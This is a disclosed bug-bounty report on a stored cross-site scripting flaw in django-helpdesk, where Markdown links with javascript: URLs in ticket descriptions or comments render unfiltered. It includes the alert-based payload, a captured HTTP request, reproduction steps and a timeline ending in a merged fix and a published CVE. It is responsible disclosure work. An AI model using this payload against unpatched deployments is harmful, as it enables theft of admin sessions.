Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk


Reported on

Nov 19th 2021


Stored XSS via Markdown at Description or Comment of Ticket


When rendering to Markdown, the application does not filter and check the properties are valid, so when the user enters [XSS](javascript:alert(`document.domain`)) it will render as <a href="javascript:alert(document.domain)">XSS</a> .

Proof of Concept

// PoC.req
POST /tickets/submit/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
Content-Length: 1161
DNT: 1
Connection: close
Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Content-Disposition: form-data; name="csrfmiddlewaretoken"

Content-Disposition: form-data; name="queue"

Content-Disposition: form-data; name="title"

XSS Markdown
Content-Disposition: form-data; name="body"

Content-Disposition: form-data; name="priority"

Content-Disposition: form-data; name="due_date"

Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="submitter_email"

Step to Reproduce


Goto URL without login to create a new ticket: https://[DOMAIN]/tickets/submit/

At field [Description of your issue input with payload: [XSS](javascript:alert(`document.domain`))

Comment Ticket

At field [Comment / Resolution] input with payload: [XSS](javascript:alert(`document.domain`))

The XSS will trigger when the admin click on the content of the description or the comment


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the django-helpdesk team within 24 hours. 15 days ago
lethanhphuc submitted a
15 days ago
We have contacted a member of the django-helpdesk team and are waiting to hear back 14 days ago
We have contacted a member of the django-helpdesk team and are waiting to hear back 14 days ago
Garret Wassermann validated this vulnerability 12 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Garret Wassermann confirmed that a fix has been merged on a22eb0 12 days ago
lethanhphuc has been awarded the fix bounty
Jamie Slome
3 days ago


CVE published! 🎊